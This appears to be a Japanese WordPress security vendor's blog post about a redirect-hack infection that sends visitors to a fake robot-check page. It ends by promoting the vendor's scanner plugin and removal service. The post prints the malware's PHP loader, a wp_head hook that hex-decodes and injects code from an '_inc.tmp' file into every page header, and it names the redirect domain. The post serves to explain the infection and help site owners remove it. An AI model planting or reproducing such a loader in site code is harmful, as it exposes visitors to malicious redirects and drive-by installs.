ワードプレスサイトがロボット確認用の別のサイトに勝手に飛ばされるリダイレクトハックの事例が昨今増えています。このマルウェア埋め込みの事例と対処方法をご紹介いたします。
マルウェアの特徴と症状
このマルウェアは下記のようなコードで、ワードプレスサイトのヘッダーに不正なJAVASCRIPTコードを埋め込み、サイトにアクセスしてきたユーザーをロボット確認用の偽のページに飛ばしてしまいます。
このようなマルウェアのタイプをリダイレクトハックと呼びます。
add_action('wp_head', 'get_hex_cache', 12);
function get_hex_cache()
{
return print(@hex2bin( '数字' . (file_get_contents(__DIR__ .'/_inc.tmp'))));
}
このコードは、ワードプレスのヘッダー出力に割り込む処理で、inc.tmp という不正なコード本体を読み込んでサイトの全ページのヘッダーにマルウェアを埋め込んできます。
このマルウェアの不正なコードによってguesswhatnewsコム というドメインに飛ばされることが多く、サイトのコンテンツが閲覧不能になるため、ユーザーはコンテンツを見ることもできず、飛ばされた先の不正なページにてウィルスのインストールなどを誤って行ってしまう可能性もございます。
マルウェアを検出駆除する
このマルウェアは、サイト上のテーマやプラグイン、コアファイルのあらゆる場所に不正なコードを埋め込むため、発見は容易ではございません。
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
をご利用いただくと、検出と駆除が可能となっております。
お試しいただけましたら幸いです。
WordPress ワードプレスのマルウェア駆除を経験豊かな専門家が代行したします。お気軽にご依頼・ご相談お送りください。
